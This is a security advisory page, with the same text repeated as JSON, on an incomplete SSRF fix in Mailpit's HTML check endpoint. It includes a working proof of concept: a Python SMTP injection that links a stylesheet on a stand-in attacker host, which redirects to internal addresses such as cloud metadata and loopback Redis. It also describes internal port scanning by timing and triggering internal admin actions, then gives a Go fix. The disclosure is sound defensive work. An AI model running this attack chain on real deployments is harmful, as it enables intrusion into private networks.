Search criteria

Related vulnerabilities

GHSA-J3FJ-QPPJ-FMMC

Vulnerability from github – Published: 2026-05-19 15:52 – Updated: 2026-05-19 15:52
VLAI
Summary
Mailpit has an incomplete fix for GHSA-6jxm: HTML check still permits SSRF to private/loopback/IMDS via missing IP-filter dialer
Details

Summary

The fix for GHSA-6jxm-fv7w-rw5j (CVE-2026-23845, "Server-Side Request Forgery (SSRF) via HTML Check API"), shipped in mailpit v1.28.3, hardened internal/htmlcheck/css.go::downloadCSSToBytes with a 5MB size cap, a text/css content-type check, login-info stripping in isValidURL, and an opt-in --block-remote-css-and-fonts config flag — but did not add the IP-filtering dialer that the same codebase already uses on the two sister SSRF endpoints (the proxy handler and link-check). At HEAD 8bc966e61834a24c48b4465da418f75e73be0afd (2026-05-06), internal/htmlcheck/css.go::newSafeHTTPClient is mis-named — it builds an http.Client whose Transport.DialContext calls net.Dialer.DialContext directly with no IP allowlisting. As a result, the SSRF originally reported by Bao Anh Phan still permits the server to dial:

  • loopback (127.0.0.0/8, ::1),
  • private (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, fc00::/7),
  • link-local incl. cloud IMDS (169.254.0.0/16, especially 169.254.169.254),
  • CGNAT (100.64.0.0/10),
  • and any other reserved/multicast range,

— provided the target replies with HTTP/200 and a content-type beginning with text/css. With redirect-following (CheckRedirect allows redirects to any isValidURL URL with no IP filter), an attacker-controlled public site can redirect mailpit's request into the private network without ever appearing in the email's HTML.

In the default mailpit deploy (no UI auth, no SMTP auth, port 1025/8025 exposed), this is an unauthenticated, network-reachable SSRF triggered by sending an HTML email and then issuing one HTTP GET to /api/v1/message/{id}/html-check.

Affected versions

  • internal/htmlcheck/css.go at HEAD 8bc966e61834a24c48b4465da418f75e73be0afd (2026-05-06).
  • All versions >= v1.28.3 (the version that shipped the GHSA-6jxm fix). Versions <= v1.28.2 are vulnerable to the original GHSA-6jxm; versions >= v1.28.3 carry the still-vulnerable variant described here.

The incomplete fix

The original GHSA-6jxm fix added size+content-type+login-info hardening to downloadCSSToBytes. But the dialer it uses still has no safeDialContext. The companion linkcheck and proxy handlers in the same codebase have all-three protections: size cap, content-type/redirect filter, AND a safeDialContext that runs tools.IsInternalIP(ip.IP) per resolved address — same pattern the htmlcheck dialer should adopt.

Side-by-side at HEAD 8bc966e:

File Function safeDialContext (IP filter)? TOCTOU-safe (dial-by-IP)?
internal/linkcheck/status.go::safeDialContext line 140-163 dial check YES YES (resolved IP joined with port)
server/handlers/proxy.go::safeDialContext line 393-415 dial check YES YES
internal/htmlcheck/css.go::newSafeHTTPClient line 275-310 dial check NO n/a

The mis-named newSafeHTTPClient reads:

// internal/htmlcheck/css.go:275-310
func newSafeHTTPClient() *http.Client {
    dialer := &net.Dialer{
        Timeout:   5 * time.Second,
        KeepAlive: 30 * time.Second,
    }

    tr := &http.Transport{
        Proxy: nil,
        DialContext: func(ctx context.Context, network, address string) (net.Conn, error) {
            return dialer.DialContext(ctx, network, address)   // no IP filter
        },
        ...
    }

    client := &http.Client{
        Transport: tr,
        Timeout:   15 * time.Second,
        CheckRedirect: func(req *http.Request, via []*http.Request) error {
            if len(via) >= 3 { return errors.New("too many redirects") }
            if !isValidURL(req.URL.String()) { return errors.New("invalid redirect URL") }
            return nil
        },
    }
    return client
}

isValidURL only rejects non-http(s) and userinfo URLs — it does NOT reject internal IPs. Compare linkcheck/status.go::safeDialContext:

ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
...
if !config.AllowInternalHTTPRequests {
    for _, ip := range ips {
        if tools.IsInternalIP(ip.IP) {
            return nil, fmt.Errorf("blocked request to %s (%s): private/reserved address", host, ip)
        }
    }
}
return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))

That's the protection htmlcheck is missing.

Reachability chain (default deploy)

Listen()                                 # config/config.go:36 SMTPListen = "[::]:1025"
   ↓
SMTP server                              # internal/smtpd/main.go:222-249  AuthRequired: false, AuthHandler: nil
   ↓ attacker injects HTML body with <link rel="stylesheet" href="...attacker.com/redirect.css">
   ↓
storage.Store(...)
   ↓
Listen()                                 # server/server.go HTTPListen
   ↓ attacker sends GET /api/v1/message/{id}/html-check
apiv1.HTMLCheck                          # server/apiv1/other.go:18
   ↓ no UI auth in default deploy (auth.UICredentials == nil)
htmlcheck.RunTests(msg.HTML)             # internal/htmlcheck/main.go:17
   ↓
runCSSTests → inlineRemoteCSS            # internal/htmlcheck/css.go:25, 132
   ↓
downloadCSSToBytes(href)                 # internal/htmlcheck/css.go:192
   ↓
newSafeHTTPClient()                      # internal/htmlcheck/css.go:275
   ↓ no IP filter on Transport.DialContext or CheckRedirect
client.Do(req) → attacker-controlled origin → 302 redirect to internal IP → success

PoC

Default-deploy reproduction (no auth):

# 1) start mailpit with defaults (no --smtp-auth, no --ui-auth)
docker run -p 1025:1025 -p 8025:8025 axllent/mailpit:latest

# 2) attacker hosts a redirect to an internal target
#    e.g., http://attacker.example.com/test.css → 302 → http://169.254.169.254/...

# 3) inject email via SMTP (no auth required)
python3 - <<'EOF'
import smtplib
from email.mime.text import MIMEText
html = '''<!DOCTYPE html><html><head>
  <link rel="stylesheet" href="http://attacker.example.com/test.css">
</head><body>x</body></html>'''
m = MIMEText(html, 'html')
m['Subject'] = 'mailpit-001'
m['From'] = 'a@b'
m['To']   = 'c@d'
with smtplib.SMTP('localhost', 1025) as s:
    s.send_message(m)
EOF

# 4) get the message ID
ID=$(curl -s http://localhost:8025/api/v1/messages?limit=1 | jq -r '.messages[0].ID')

# 5) trigger the SSRF with one anonymous GET
curl -i http://localhost:8025/api/v1/message/$ID/html-check

The HTTP server-side dial follows http://attacker.example.com/test.css → 302 redirect to http://127.0.0.1:6379/ → mailpit completes a TCP connect to the loopback Redis. No request body is reflected to the attacker (mailpit only inlines successful 200 + text/css responses), but:

  • State-changing internal GETs. Any internal admin app served on 127.0.0.1 or RFC1918 with a "GET /admin/restart", "GET /vacuum", "GET /flush" pattern can be triggered through this primitive. Several common stacks (Spring Actuator, etcd debug, internal Prometheus admin, Redis HTTP front-ends, Jaeger UI) expose such operations on private ports.
  • Cloud-IMDS reachability oracle. Because IMDS responses don't carry text/css, the body is not inlined — but the redirect chain DOES dial 169.254.169.254. A side-channel (response time, DNS log) can confirm IMDS reachability from a default-deploy mailpit on cloud.
  • Internal port-scan via timing. The 5s+15s timeouts produce a clear timing differential between "RST refused" (~ms), "open and HTTP-noisy" (~10ms+), and "filtered" (multi-second).
  • Authenticated Mailpit/<version> GET. Every internal target sees a known UA from a trusted internal subnet; combined with redirect-stripping, this can fool internal allowlists keyed on UA.

Threat model alignment

The maintainer's prior position on the SSRF class is captured by GHSA-6jxm-fv7w-rw5j (HTML Check, Medium), GHSA-mpf7-p9x7-96r3 (Link Check, Medium), and GHSA-8v65-47jx-7mfr (Proxy Endpoint, Medium). All three are siblings in the same SSRF class, and the maintainer chose to remediate each via a safeDialContext-style filter in the linkcheck and proxy fixes. The htmlcheck fix is the outlier: same class, same severity, but the IP filter was not applied. The remaining surface is therefore a regression of the published fix's stated goal ("disallow internal targets").

Default-deploy reachability is unauthenticated (per the maintainer's own README, mailpit is intended to run without auth in dev/CI). With UI auth configured, the same primitive is post-auth — still useful (UI-auth mailpit deployments often live on the internal/ops subnet, exposing other ops services).

Suggested fix

Make newSafeHTTPClient use the same safeDialContext pattern already proven in linkcheck/status.go and server/handlers/proxy.go. Concretely:

// internal/htmlcheck/css.go
func newSafeHTTPClient() *http.Client {
    dialer := &net.Dialer{
        Timeout:   5 * time.Second,
        KeepAlive: 30 * time.Second,
    }

    tr := &http.Transport{
        Proxy:                 nil,
        DialContext:           safeDialContext(dialer),  // ← add IP filter
        TLSHandshakeTimeout:   5 * time.Second,
        ResponseHeaderTimeout: 10 * time.Second,
        ExpectContinueTimeout: 1 * time.Second,
        IdleConnTimeout:       30 * time.Second,
        MaxIdleConns:          50,
    }

    client := &http.Client{
        Transport: tr,
        Timeout:   15 * time.Second,
        CheckRedirect: func(req *http.Request, via []*http.Request) error {
            if len(via) >= 3 {
                return errors.New("too many redirects")
            }
            if !isValidURL(req.URL.String()) {
                return errors.New("invalid redirect URL")
            }
            // safeDialContext re-runs IP filter on each hop's Dial,
            // so redirect target IP is also enforced.
            return nil
        },
    }
    return client
}

// safeDialContext is the same pattern as linkcheck/status.go::safeDialContext
// — copy the function (or factor a shared helper into internal/tools/net.go).
func safeDialContext(dialer *net.Dialer) func(ctx context.Context, network, address string) (net.Conn, error) {
    return func(ctx context.Context, network, address string) (net.Conn, error) {
        host, port, err := net.SplitHostPort(address)
        if err != nil { return nil, err }
        ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)
        if err != nil { return nil, err }
        if !config.AllowInternalHTTPRequests {
            for _, ip := range ips {
                if tools.IsInternalIP(ip.IP) {
                    return nil, fmt.Errorf("blocked request to %s (%s): private/reserved address", host, ip)
                }
            }
        }
        return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))
    }
}

Two further hardening notes:

  1. Add CGNAT 100.64.0.0/10 (RFC 6598). tools.IsInternalIP covers loopback, private, link-local, multicast, unspecified — but not CGNAT. This affects all three SSRF dialers (htmlcheck, linkcheck, proxy). Tailscale tailnets and GCP IAP fall in 100.64.0.0/10; an mailpit instance running on a Tailscale node can be used to pivot into the tailnet. Concrete fix: extend tools.IsInternalIP with cgnat := net.IPNet{IP: net.IPv4(100, 64, 0, 0), Mask: net.CIDRMask(10, 32)}; if cgnat.Contains(ip) { return true }.
  2. Re-validate the rename. newSafeHTTPClient is a misleading name today — once the dialer is hardened, the name will be accurate. Until then, consider renaming it to newHTTPClient to remove the false sense of safety it conveys to maintainers reading the file.

Reproduction environment

  • Tested against: HEAD 8bc966e61834a24c48b4465da418f75e73be0afd (2026-05-06).
  • Code locations:
  • Vulnerable dialer: internal/htmlcheck/css.go:275-310
  • Vulnerable downloader: internal/htmlcheck/css.go:192-229
  • Reachability gate: internal/htmlcheck/css.go:131-187 (inlineRemoteCSS)
  • Trigger handler: server/apiv1/other.go:18-79 (HTMLCheck)
  • Default no-UI-auth: internal/auth/auth.go + middleware in server/server.go:317
  • Default no-SMTP-auth: internal/smtpd/main.go:229-230
  • Sister fixed dialers (for diff): internal/linkcheck/status.go:140-163, server/handlers/proxy.go:393-415

Reporter

Eddie Ran. Filed via reporter API.

Severity
5.8 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/axllent/mailpit"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.28.3"
            },
            {
              "fixed": "1.30.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-45709"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-19T15:52:16Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nThe fix for GHSA-6jxm-fv7w-rw5j (CVE-2026-23845, \"Server-Side Request Forgery (SSRF) via HTML Check API\"), shipped in mailpit `v1.28.3`, hardened `internal/htmlcheck/css.go::downloadCSSToBytes` with a 5MB size cap, a `text/css` content-type check, login-info stripping in `isValidURL`, and an opt-in `--block-remote-css-and-fonts` config flag \u2014 but **did not add the IP-filtering dialer that the same codebase already uses on the two sister SSRF endpoints** (the proxy handler and link-check). At HEAD `8bc966e61834a24c48b4465da418f75e73be0afd` (2026-05-06), `internal/htmlcheck/css.go::newSafeHTTPClient` is mis-named \u2014 it builds an `http.Client` whose `Transport.DialContext` calls `net.Dialer.DialContext` directly with no IP allowlisting. As a result, the SSRF originally reported by Bao Anh Phan still permits the server to dial:\n\n- loopback (`127.0.0.0/8`, `::1`),\n- private (`10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`, `fc00::/7`),\n- link-local incl. **cloud IMDS** (`169.254.0.0/16`, especially `169.254.169.254`),\n- CGNAT (`100.64.0.0/10`),\n- and any other reserved/multicast range,\n\n\u2014 provided the target replies with `HTTP/200` and a content-type beginning with `text/css`. With redirect-following (`CheckRedirect` allows redirects to any `isValidURL` URL with no IP filter), an attacker-controlled public site can redirect mailpit\u0027s request into the private network without ever appearing in the email\u0027s HTML.\n\nIn the default mailpit deploy (no UI auth, no SMTP auth, port 1025/8025 exposed), this is an unauthenticated, network-reachable SSRF triggered by sending an HTML email and then issuing one HTTP `GET` to `/api/v1/message/{id}/html-check`.\n\n## Affected versions\n\n- `internal/htmlcheck/css.go` at HEAD `8bc966e61834a24c48b4465da418f75e73be0afd` (2026-05-06).\n- All versions `\u003e= v1.28.3` (the version that shipped the GHSA-6jxm fix). Versions `\u003c= v1.28.2` are vulnerable to the original GHSA-6jxm; versions `\u003e= v1.28.3` carry the still-vulnerable variant described here.\n\n## The incomplete fix\n\nThe original GHSA-6jxm fix added size+content-type+login-info hardening to `downloadCSSToBytes`. But the dialer it uses still has no `safeDialContext`. The companion `linkcheck` and `proxy` handlers in the same codebase have all-three protections: size cap, content-type/redirect filter, **AND** a `safeDialContext` that runs `tools.IsInternalIP(ip.IP)` per resolved address \u2014 same pattern the htmlcheck dialer should adopt.\n\nSide-by-side at HEAD `8bc966e`:\n\n| File | Function | `safeDialContext` (IP filter)? | TOCTOU-safe (dial-by-IP)? |\n|---|---|---|---|\n| `internal/linkcheck/status.go::safeDialContext` line 140-163 | dial check | YES | YES (resolved IP joined with port) |\n| `server/handlers/proxy.go::safeDialContext` line 393-415 | dial check | YES | YES |\n| `internal/htmlcheck/css.go::newSafeHTTPClient` line 275-310 | dial check | **NO** | n/a |\n\nThe mis-named `newSafeHTTPClient` reads:\n\n```go\n// internal/htmlcheck/css.go:275-310\nfunc newSafeHTTPClient() *http.Client {\n    dialer := \u0026net.Dialer{\n        Timeout:   5 * time.Second,\n        KeepAlive: 30 * time.Second,\n    }\n\n    tr := \u0026http.Transport{\n        Proxy: nil,\n        DialContext: func(ctx context.Context, network, address string) (net.Conn, error) {\n            return dialer.DialContext(ctx, network, address)   // no IP filter\n        },\n        ...\n    }\n\n    client := \u0026http.Client{\n        Transport: tr,\n        Timeout:   15 * time.Second,\n        CheckRedirect: func(req *http.Request, via []*http.Request) error {\n            if len(via) \u003e= 3 { return errors.New(\"too many redirects\") }\n            if !isValidURL(req.URL.String()) { return errors.New(\"invalid redirect URL\") }\n            return nil\n        },\n    }\n    return client\n}\n```\n\n`isValidURL` only rejects non-http(s) and userinfo URLs \u2014 it does NOT reject internal IPs. Compare `linkcheck/status.go::safeDialContext`:\n\n```go\nips, err := net.DefaultResolver.LookupIPAddr(ctx, host)\n...\nif !config.AllowInternalHTTPRequests {\n    for _, ip := range ips {\n        if tools.IsInternalIP(ip.IP) {\n            return nil, fmt.Errorf(\"blocked request to %s (%s): private/reserved address\", host, ip)\n        }\n    }\n}\nreturn dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))\n```\n\nThat\u0027s the protection htmlcheck is missing.\n\n## Reachability chain (default deploy)\n\n```\nListen()                                 # config/config.go:36 SMTPListen = \"[::]:1025\"\n   \u2193\nSMTP server                              # internal/smtpd/main.go:222-249  AuthRequired: false, AuthHandler: nil\n   \u2193 attacker injects HTML body with \u003clink rel=\"stylesheet\" href=\"...attacker.com/redirect.css\"\u003e\n   \u2193\nstorage.Store(...)\n   \u2193\nListen()                                 # server/server.go HTTPListen\n   \u2193 attacker sends GET /api/v1/message/{id}/html-check\napiv1.HTMLCheck                          # server/apiv1/other.go:18\n   \u2193 no UI auth in default deploy (auth.UICredentials == nil)\nhtmlcheck.RunTests(msg.HTML)             # internal/htmlcheck/main.go:17\n   \u2193\nrunCSSTests \u2192 inlineRemoteCSS            # internal/htmlcheck/css.go:25, 132\n   \u2193\ndownloadCSSToBytes(href)                 # internal/htmlcheck/css.go:192\n   \u2193\nnewSafeHTTPClient()                      # internal/htmlcheck/css.go:275\n   \u2193 no IP filter on Transport.DialContext or CheckRedirect\nclient.Do(req) \u2192 attacker-controlled origin \u2192 302 redirect to internal IP \u2192 success\n```\n\n## PoC\n\nDefault-deploy reproduction (no auth):\n\n```bash\n# 1) start mailpit with defaults (no --smtp-auth, no --ui-auth)\ndocker run -p 1025:1025 -p 8025:8025 axllent/mailpit:latest\n\n# 2) attacker hosts a redirect to an internal target\n#    e.g., http://attacker.example.com/test.css \u2192 302 \u2192 http://169.254.169.254/...\n\n# 3) inject email via SMTP (no auth required)\npython3 - \u003c\u003c\u0027EOF\u0027\nimport smtplib\nfrom email.mime.text import MIMEText\nhtml = \u0027\u0027\u0027\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\n  \u003clink rel=\"stylesheet\" href=\"http://attacker.example.com/test.css\"\u003e\n\u003c/head\u003e\u003cbody\u003ex\u003c/body\u003e\u003c/html\u003e\u0027\u0027\u0027\nm = MIMEText(html, \u0027html\u0027)\nm[\u0027Subject\u0027] = \u0027mailpit-001\u0027\nm[\u0027From\u0027] = \u0027a@b\u0027\nm[\u0027To\u0027]   = \u0027c@d\u0027\nwith smtplib.SMTP(\u0027localhost\u0027, 1025) as s:\n    s.send_message(m)\nEOF\n\n# 4) get the message ID\nID=$(curl -s http://localhost:8025/api/v1/messages?limit=1 | jq -r \u0027.messages[0].ID\u0027)\n\n# 5) trigger the SSRF with one anonymous GET\ncurl -i http://localhost:8025/api/v1/message/$ID/html-check\n```\n\nThe HTTP server-side dial follows `http://attacker.example.com/test.css` \u2192 302 redirect to `http://127.0.0.1:6379/` \u2192 mailpit completes a TCP connect to the loopback Redis. No request body is reflected to the attacker (mailpit only inlines successful 200 + `text/css` responses), but:\n\n- **State-changing internal GETs.** Any internal admin app served on `127.0.0.1` or RFC1918 with a \"GET /admin/restart\", \"GET /vacuum\", \"GET /flush\" pattern can be triggered through this primitive. Several common stacks (Spring Actuator, etcd debug, internal Prometheus admin, Redis HTTP front-ends, Jaeger UI) expose such operations on private ports.\n- **Cloud-IMDS reachability oracle.** Because IMDS responses don\u0027t carry `text/css`, the body is not inlined \u2014 but the redirect chain DOES dial 169.254.169.254. A side-channel (response time, DNS log) can confirm IMDS reachability from a default-deploy mailpit on cloud.\n- **Internal port-scan via timing.** The 5s+15s timeouts produce a clear timing differential between \"RST refused\" (~ms), \"open and HTTP-noisy\" (~10ms+), and \"filtered\" (multi-second).\n- **Authenticated `Mailpit/\u003cversion\u003e` GET.** Every internal target sees a known UA from a trusted internal subnet; combined with redirect-stripping, this can fool internal allowlists keyed on UA.\n\n## Threat model alignment\n\nThe maintainer\u0027s prior position on the SSRF class is captured by GHSA-6jxm-fv7w-rw5j (HTML Check, Medium), GHSA-mpf7-p9x7-96r3 (Link Check, Medium), and GHSA-8v65-47jx-7mfr (Proxy Endpoint, Medium). All three are siblings in the same SSRF class, and the maintainer chose to remediate each via a `safeDialContext`-style filter in the linkcheck and proxy fixes. The htmlcheck fix is the outlier: same class, same severity, but the IP filter was not applied. The remaining surface is therefore a regression of the published fix\u0027s stated goal (\"disallow internal targets\").\n\nDefault-deploy reachability is unauthenticated (per the maintainer\u0027s own README, mailpit is intended to run without auth in dev/CI). With UI auth configured, the same primitive is post-auth \u2014 still useful (UI-auth mailpit deployments often live on the internal/ops subnet, exposing other ops services).\n\n## Suggested fix\n\nMake `newSafeHTTPClient` use the same `safeDialContext` pattern already proven in `linkcheck/status.go` and `server/handlers/proxy.go`. Concretely:\n\n```go\n// internal/htmlcheck/css.go\nfunc newSafeHTTPClient() *http.Client {\n    dialer := \u0026net.Dialer{\n        Timeout:   5 * time.Second,\n        KeepAlive: 30 * time.Second,\n    }\n\n    tr := \u0026http.Transport{\n        Proxy:                 nil,\n        DialContext:           safeDialContext(dialer),  // \u2190 add IP filter\n        TLSHandshakeTimeout:   5 * time.Second,\n        ResponseHeaderTimeout: 10 * time.Second,\n        ExpectContinueTimeout: 1 * time.Second,\n        IdleConnTimeout:       30 * time.Second,\n        MaxIdleConns:          50,\n    }\n\n    client := \u0026http.Client{\n        Transport: tr,\n        Timeout:   15 * time.Second,\n        CheckRedirect: func(req *http.Request, via []*http.Request) error {\n            if len(via) \u003e= 3 {\n                return errors.New(\"too many redirects\")\n            }\n            if !isValidURL(req.URL.String()) {\n                return errors.New(\"invalid redirect URL\")\n            }\n            // safeDialContext re-runs IP filter on each hop\u0027s Dial,\n            // so redirect target IP is also enforced.\n            return nil\n        },\n    }\n    return client\n}\n\n// safeDialContext is the same pattern as linkcheck/status.go::safeDialContext\n// \u2014 copy the function (or factor a shared helper into internal/tools/net.go).\nfunc safeDialContext(dialer *net.Dialer) func(ctx context.Context, network, address string) (net.Conn, error) {\n    return func(ctx context.Context, network, address string) (net.Conn, error) {\n        host, port, err := net.SplitHostPort(address)\n        if err != nil { return nil, err }\n        ips, err := net.DefaultResolver.LookupIPAddr(ctx, host)\n        if err != nil { return nil, err }\n        if !config.AllowInternalHTTPRequests {\n            for _, ip := range ips {\n                if tools.IsInternalIP(ip.IP) {\n                    return nil, fmt.Errorf(\"blocked request to %s (%s): private/reserved address\", host, ip)\n                }\n            }\n        }\n        return dialer.DialContext(ctx, network, net.JoinHostPort(ips[0].IP.String(), port))\n    }\n}\n```\n\nTwo further hardening notes:\n\n1. **Add CGNAT 100.64.0.0/10 (RFC 6598).** `tools.IsInternalIP` covers loopback, private, link-local, multicast, unspecified \u2014 but not CGNAT. This affects all three SSRF dialers (htmlcheck, linkcheck, proxy). Tailscale tailnets and GCP IAP fall in `100.64.0.0/10`; an mailpit instance running on a Tailscale node can be used to pivot into the tailnet. Concrete fix: extend `tools.IsInternalIP` with `cgnat := net.IPNet{IP: net.IPv4(100, 64, 0, 0), Mask: net.CIDRMask(10, 32)}; if cgnat.Contains(ip) { return true }`.\n2. **Re-validate the rename.** `newSafeHTTPClient` is a misleading name today \u2014 once the dialer is hardened, the name will be accurate. Until then, consider renaming it to `newHTTPClient` to remove the false sense of safety it conveys to maintainers reading the file.\n\n## Reproduction environment\n\n- Tested against: HEAD `8bc966e61834a24c48b4465da418f75e73be0afd` (2026-05-06).\n- Code locations:\n  - Vulnerable dialer: `internal/htmlcheck/css.go:275-310`\n  - Vulnerable downloader: `internal/htmlcheck/css.go:192-229`\n  - Reachability gate: `internal/htmlcheck/css.go:131-187` (`inlineRemoteCSS`)\n  - Trigger handler: `server/apiv1/other.go:18-79` (`HTMLCheck`)\n  - Default no-UI-auth: `internal/auth/auth.go` + middleware in `server/server.go:317`\n  - Default no-SMTP-auth: `internal/smtpd/main.go:229-230`\n  - Sister fixed dialers (for diff): `internal/linkcheck/status.go:140-163`, `server/handlers/proxy.go:393-415`\n\n## Reporter\n\nEddie Ran. Filed via reporter API.",
  "id": "GHSA-j3fj-qppj-fmmc",
  "modified": "2026-05-19T15:52:16Z",
  "published": "2026-05-19T15:52:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/axllent/mailpit/security/advisories/GHSA-j3fj-qppj-fmmc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/axllent/mailpit"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Mailpit has an incomplete fix for GHSA-6jxm: HTML check still permits SSRF to private/loopback/IMDS via missing IP-filter dialer"
}